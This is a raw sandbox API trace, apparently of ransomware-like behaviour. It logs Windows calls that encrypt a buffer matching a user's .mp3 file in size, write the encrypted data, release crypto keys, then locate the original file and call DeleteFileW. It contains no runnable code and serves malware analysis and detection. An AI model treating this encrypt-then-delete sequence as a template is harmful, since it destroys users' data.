1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaf78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.423] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xcc62, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xcc68) returned 1 [0208.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.423] CharLowerBuffW (in: lpsz="byte[52328]", cchLength=0xb | out: lpsz="byte[52328]") returned 0xb [0208.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.424] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.424] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.424] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.424] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.424] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaac30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.425] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xcc62, dwBufLen=0xcc68 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xcc68) returned 1 [0208.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.427] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.427] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.427] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.427] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.427] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.427] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.427] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.427] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.427] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.427] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.428] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.433] WriteFile (in: hFile=0x524, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xcc68, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xcc68, lpOverlapped=0x0) returned 1 [0208.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.435] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.435] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.435] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.435] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.435] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.435] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.435] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.435] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.435] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.436] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaadb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.436] CryptDestroyKey (hKey=0x9e2078) returned 1 [0208.436] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.436] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.436] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.436] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.436] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.436] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.437] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.437] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.437] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.437] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.437] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.437] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.437] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.437] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.437] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.437] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.437] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.437] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.437] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.437] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.438] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.438] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.438] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.438] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.438] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.438] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.438] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.438] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.438] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.438] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.438] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.438] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.438] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.438] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.438] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.438] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.438] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.438] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.438] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.438] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.439] CryptReleaseContext (hProv=0xa7ca18, dwFlags=0x0) returned 1 [0208.439] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.439] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.439] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.439] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.439] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.439] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.439] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.439] CloseHandle (hObject=0x510) returned 1 [0208.441] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.441] CloseHandle (hObject=0x524) returned 1 [0208.443] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.445] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.445] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.445] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.445] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3", lpFilePart=0x8cedf4*="YXHKkgRMJbmq7xZC.mp3") returned 0x2a [0208.446] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3" (normalized: "c:\\users\\fd1hvy\\music\\yxhkkgrmjbmq7xzc.mp3")) returned 0x20 [0208.446] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda42a390, ftCreationTime.dwHighDateTime=0x1d5d4e4, ftLastAccessTime.dwLowDateTime=0x1137f5f0, ftLastAccessTime.dwHighDateTime=0x1d5ce85, ftLastWriteTime.dwLowDateTime=0x1137f5f0, ftLastWriteTime.dwHighDateTime=0x1d5ce85, nFileSizeHigh=0x0, nFileSizeLow=0xcc62, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="YXHKkgRMJbmq7xZC.mp3", cAlternateFileName="YXHKKG~1.MP3")) returned 0x9e21f8 [0208.446] DeleteFileW 